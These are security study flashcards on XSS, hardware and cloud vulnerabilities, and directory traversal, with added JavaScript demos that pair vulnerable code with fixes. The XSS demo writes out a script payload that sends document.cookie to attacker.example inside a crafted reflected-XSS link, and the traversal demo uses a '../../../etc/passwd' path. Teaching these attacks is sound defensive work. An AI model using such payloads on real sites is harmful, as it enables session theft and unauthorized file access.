XSS, Hardware vulnerabilities, Cloud-specific, Supply chain Flashcards
XSS (Cross-site scripting)
Takes advantage of the trust a user has for a website: attacker-supplied script runs in the user's browser under the site's own origin.
**Commonly uses JavaScript
Reflected XSS
Script embedded in a URL (or another request parameter) is echoed back by the server and executes in the victim's browser.
The victim is the person who executes the code, usually by being tricked into following a crafted link.
Persistent (stored) XSS
App stores user input, such as comments or messages, in its database and later displays it to other users, so the script runs in the browser of everyone who views that page.
Protecting against XSS includes:
-Careful clicking of untrusted links
-Consider disabling JavaScript
-Update browser/apps
-Don't allow users to add their own scripts (validate input, and encode output before rendering it)
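The reflected and stored cases on these cards, side by side with the output-encoding fix, as an added example that is not from the original flashcards. It runs under Node.js with no dependencies; the hostnames, the comment store and the attacker payload are constructed for the demo.

```javascript
// Added example, not from the original flashcards: a tiny in-memory site
// showing reflected and stored XSS, each next to its output-encoded fix.
// Runs under Node.js with no dependencies. Hostnames and payloads below are
// constructed for the demo.

// Entity-encode text for placement inside an HTML element body. Attribute,
// URL and script contexts each need their own encoder; this covers the
// element-content case the cards describe.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reflected XSS: the search term from the URL is echoed into the page.
function renderSearchUnsafe(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return '<p>Results for: ' + q + '</p>';          // raw concatenation
}
function renderSearchSafe(url) {
  const q = new URL(url).searchParams.get('q') ?? '';
  return '<p>Results for: ' + escapeHtml(q) + '</p>';
}

// Stored XSS: comments go into a store and are later rendered for everyone.
function postComment(store, author, body) {
  store.push({ author, body });            // stored verbatim, as most apps do
}
function renderCommentsUnsafe(store) {
  return '<ul>' + store.map(c =>
    '<li><b>' + c.author + '</b>: ' + c.body + '</li>').join('') + '</ul>';
}
function renderCommentsSafe(store) {
  return '<ul>' + store.map(c =>
    '<li><b>' + escapeHtml(c.author) + '</b>: ' + escapeHtml(c.body) + '</li>').join('') + '</ul>';
}

// Crude detector used to compare outputs: is there still a live <script> tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker payload: sends the document cookie to a hypothetical host.
const PAYLOAD = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
// Constructed reflected-XSS link the victim would be tricked into opening.
const REFLECTED_URL = 'https://shop.example/search?q=' + encodeURIComponent(PAYLOAD);

// Render both scenarios, vulnerable and fixed, and return the four HTML strings.
function demo() {
  const store = [];
  postComment(store, 'alice', 'Nice shoes & fast shipping');
  postComment(store, 'mallory', PAYLOAD);
  return {
    reflectedUnsafe: renderSearchUnsafe(REFLECTED_URL),
    reflectedSafe: renderSearchSafe(REFLECTED_URL),
    storedUnsafe: renderCommentsUnsafe(store),
    storedSafe: renderCommentsSafe(store),
  };
}
```

Call `demo()` and compare the pairs: the unsafe outputs still carry a live `<script>` element, while the safe ones carry only `&lt;script&gt;` text, which the browser shows but never runs. Note that the fix lives on the rendering side of the server; none of the user-side tips on the card (careful clicking, disabling JavaScript) protect the other visitors of a site with a stored payload.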
Why is hardware a potential security risk?
Perfect entry point for an attack: devices often run unpatched firmware and stay in service after the vendor stops supporting them
Firmware
Software embedded in a hardware device that controls it (e.g., BIOS/UEFI or a device's embedded controller)
End of Life (EOL)
Notice from the manufacturer that it will stop selling the product at a future date; support may continue for a while after that.
End of service life (EOSL)
○ Manufacturer stops selling the product
○ Support (patches and updates) is no longer available
What are some virtualization vulnerabilities?
-Local privilege escalation
-Command injection
-Info disclosure
Hypervisor
Manages the relationship between physical & virtual resources.
True or false: RAM is allocated to VMs from the host's shared physical memory
True
True or false: Data can inadvertently be shared between VMs
True (when the hypervisor fails to isolate memory or storage properly)
Cloud specific vulnerabilities (attacking the service) include:
-Authentication bypass
-Directory traversal
-Remote code execution
Authentication bypass
Takes advantage of weak or faulty authentication to reach resources without valid credentials
Directory traversal
Ability to move outside the web server's document root into other folders and subdirectories, usually by placing ../ sequences in a path parameter
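The ../ mechanism behind directory traversal, shown as where a naive file-path join really ends up and then as a check that refuses the escape, as an added example that is not from the original flashcards. Plain JavaScript with no modules; `WEB_ROOT` and the requested paths are constructed.

```javascript
// Added example, not from the original flashcards: how a path parameter
// such as ?file=../../etc/passwd escapes the web root, and a check that
// stops it. Plain JavaScript, no modules; the document root is hypothetical.
const WEB_ROOT = '/var/www/html';

// Collapse '.' and '..' the way the filesystem will when the path is opened.
// Used only to show where a naive join really ends up.
function osResolve(absPath) {
  const out = [];
  for (const seg of absPath.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') { out.pop(); continue; }   // '..' at '/' stays at '/'
    out.push(seg);
  }
  return '/' + out.join('/');
}

// Vulnerable: decode the parameter and glue it onto the root.
function naiveJoin(root, requested) {
  return root + '/' + decodeURIComponent(requested);
}

// Hardened: decode once, walk the segments ourselves, and refuse any
// request that would step above the root. Returns null on rejection.
function resolveRequestPath(root, requested) {
  let decoded;
  try { decoded = decodeURIComponent(requested); } catch (e) { return null; }
  // Decoding once and then rejecting a leftover '%' means a double-encoded
  // "%252e%252e" cannot be turned back into ".." by a later decode layer.
  // A null byte is rejected too, so nothing can truncate the path later.
  if (decoded.includes('%') || decoded.includes('\0')) return null;
  const segments = [];
  for (const seg of decoded.split(/[\\\/]+/)) {  // treat backslash like slash
    if (seg === '' || seg === '.') continue;
    if (seg === '..') {
      if (segments.length === 0) return null;    // would climb above root
      segments.pop();
      continue;
    }
    segments.push(seg);
  }
  return root + '/' + segments.join('/');
}
```

`osResolve(naiveJoin(WEB_ROOT, '../../../etc/passwd'))` comes out as `/etc/passwd`, which is the whole attack; `resolveRequestPath` returns `null` for the same input, for its URL-encoded and double-encoded forms, and for a backslash variant, while still serving ordinary paths like `images/logo.png`. In a real server you would additionally canonicalize symlinks (realpath) before the prefix check, since a link inside the root can point outside it.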